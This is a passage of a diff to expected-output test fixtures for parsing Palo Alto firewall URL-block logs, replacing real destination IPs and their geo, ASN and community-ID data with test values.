"1:J9ymoylt3wkbcwWFUbTc1FK8W6k=", - "1:kCzU3MoZUMh7VlhTewngoP1twbw=" + "1:vx6QhA66UfS/uMptkCPXbSs/VIc=", + "1:vEVgzoaf3bFxNSHxElyZGdPv0tk=" ], "transport": "tcp", "application": "ssl", @@ -6344,14 +6415,14 @@ ], "ip": [ "192.168.15.224", - "54.192.7.152", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768109425Z", - "original": "Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,54.192.7.152,192.168.1.63,54.192.7.152,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691864900Z", + "original": "Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:54.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -6374,29 +6445,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6412,14 +6482,14 @@ "port": 53093, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -6434,7 +6504,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:fj3W3hxHPqT4snZlcRibDiqLNvs=" + "community_id": "1:0OZauWAwEciMS/9irO/mxKpEVd0=" } }, "threat_category": "unknown", @@ -6479,8 +6549,8 @@ ], "network": { "community_id": [ - "1:DDpR8PTbIvvnd+7Hcre+jZQVtaY=", - "1:fj3W3hxHPqT4snZlcRibDiqLNvs=" + "1:TOolTBDfCoqemaWK2qQluUYjXNE=", + "1:0OZauWAwEciMS/9irO/mxKpEVd0=" ], "transport": "tcp", "application": "ssl", @@ -6519,14 +6589,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768113669Z", - "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691871300Z", + "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -6549,29 +6619,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6587,14 +6656,14 @@ "port": 53094, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -6609,7 +6678,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:HLMiinoD9jzLzaYU394wqKksBUE=" + "community_id": "1:aNs8G57tIhcmdkGe7UOW3/6liUc=" } }, "threat_category": "unknown", @@ -6654,8 +6723,8 @@ ], "network": { "community_id": [ - "1:1dccHKUcnMkeYh68uGS1Jhl6+Hk=", - "1:HLMiinoD9jzLzaYU394wqKksBUE=" + "1:i8meAqHKtkJqKE+9I5xppo1GRCQ=", + "1:aNs8G57tIhcmdkGe7UOW3/6liUc=" ], "transport": "tcp", "application": "ssl", @@ -6694,14 +6763,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768117683Z", - "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691877600Z", + "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -6724,29 +6793,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6762,14 +6830,14 @@ "port": 53095, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -6784,7 +6852,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:pNMLPgDpZv2+S840jW/Ggq8ng2I=" + "community_id": "1:QRwP1E+IZQNepZx937GDIP0ogg8=" } }, "threat_category": "unknown", @@ -6829,8 +6897,8 @@ ], "network": { "community_id": [ - "1:URFNGbFKOwT3Iaugo33D1mB/ndw=", - "1:pNMLPgDpZv2+S840jW/Ggq8ng2I=" + "1:YeyPRcMlDZkftNtQRcTv91rAex4=", + "1:QRwP1E+IZQNepZx937GDIP0ogg8=" ], "transport": "tcp", "application": "ssl", @@ -6869,14 +6937,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768121559Z", - "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691883900Z", + "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -6899,29 +6967,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6937,14 +7004,14 @@ "port": 53096, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -6959,7 +7026,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:l6AkSmB92aDAHpLhiSCR28J+ANI=" + "community_id": "1:xgJ/pNC9QdddGZU7CHgNbvJZaxs=" } }, "threat_category": "unknown", @@ -7004,8 +7071,8 @@ ], "network": { "community_id": [ - "1:/KMTfFetIlydTraxch89t5PYve0=", - "1:l6AkSmB92aDAHpLhiSCR28J+ANI=" + "1:bZsuzLGfi0LYswmLphwUFWuQd1w=", + "1:xgJ/pNC9QdddGZU7CHgNbvJZaxs=" ], "transport": "tcp", "application": "ssl", @@ -7044,14 +7111,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768142568Z", - "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691888200Z", + "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -7074,29 +7141,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7112,14 +7178,14 @@ "port": 53097, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -7134,7 +7200,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:33ah/rOB1xL3Yy0FUH0sEGuRvx8=" + "community_id": "1:IO/IfwpXRNzULdZcWB329gUsmOw=" } }, "threat_category": "unknown", @@ -7179,8 +7245,8 @@ ], "network": { "community_id": [ - "1:Z8gFtZEJJ5xho2+kyaSyoXp1O/I=", - "1:33ah/rOB1xL3Yy0FUH0sEGuRvx8=" + "1:w6xclyF2pQGez58w0M8x52894Q4=", + "1:IO/IfwpXRNzULdZcWB329gUsmOw=" ], "transport": "tcp", "application": "ssl", @@ -7219,14 +7285,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768147659Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691893300Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -7249,29 +7315,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7287,14 +7352,14 @@ "port": 53099, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -7309,7 +7374,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:zOzoB9ZSg+/QZ7bt4sM6/I2TOXc=" + "community_id": "1:tHHvq2Jp4stMPZG5A+v5ZHY0TiU=" } }, "threat_category": "unknown", @@ -7354,8 +7419,8 @@ ], "network": { "community_id": [ - "1:dS0Vb9L/suztc58TuCJc5kLrnd4=", - "1:zOzoB9ZSg+/QZ7bt4sM6/I2TOXc=" + "1:ZkDeoTepE92XWecwZ9ysJEiL3uY=", + "1:tHHvq2Jp4stMPZG5A+v5ZHY0TiU=" ], "transport": "tcp", "application": "ssl", @@ -7394,14 +7459,14 @@ ], "ip": [ "192.168.15.224", - "52.4.120.175", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768151614Z", - "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691898900Z", + "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -7424,29 +7489,28 @@ "destination": { "nat": { "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "52.4.120.175" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7462,14 +7526,14 @@ "port": 53100, "ip": "192.168.15.224" }, - "message": "192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 